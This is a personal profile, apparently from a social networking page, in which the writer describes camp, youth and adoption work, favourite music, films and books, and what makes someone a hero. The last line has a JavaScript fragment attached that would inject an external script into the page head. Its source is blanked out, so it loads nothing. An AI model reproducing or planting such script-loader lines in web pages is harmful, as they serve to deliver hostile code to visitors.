hmmm..most of my time is spent catching up with friends... HOLT camp (of course), working with kids/youth, adoption..i love to read..wish i had more time to do it, really want to travel.especially korea and italy....i love pink..and girly stuff..what else? i love being outside. love the water, if i had more time i know id have more interests..LOL.
ANYONE...who would i like to see in person?? the almond jois and others from camp of course..who else?? someone that can inspire me and teach me something! I guess that could be anyone....
the girls: norah, sarah.. rosie thomas, jonatha brooks-
Tons of Songs at ..!
YOUve got mail!!! I feel like the movie is constantly running through my head. serendipity, millions, memoirs of a geisha..i love a good drama but think about realities all the time with school- so its nice to veg out with a nice love story...who doesnt love a happy ending?
DOnt have time to watch TV..EVER!! i think this is a good thing. =)
pride and prejuduce..anything jane austen. Persuassion." c.s. lewis, the Alchemist, TUESDAYS WITH MORRIE! i read it at least once a year. READ IT if you havent. it will inspire you! "memoirs of a geisha", "the life you;ve always wanted" (john olerud) "Amazing grace and savage inequalities. by jonothon kozol..."please understand me" keirsey tempermany always refering to it. =) im an enfp
I have a lot..people that have encouraged me by the way they live their daily lives.. .too many people to name..,many people i know.... people who advocate and sacrifice for others selflessly...not for recognition..but becuase they care more for someone than themselves...what is more HEROIC than loving or caring for someone, even a stranger, selflessly and ACTING upon it...or recognizing/ speaking out for a group of people who are oppressed outside of your own privledge? .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"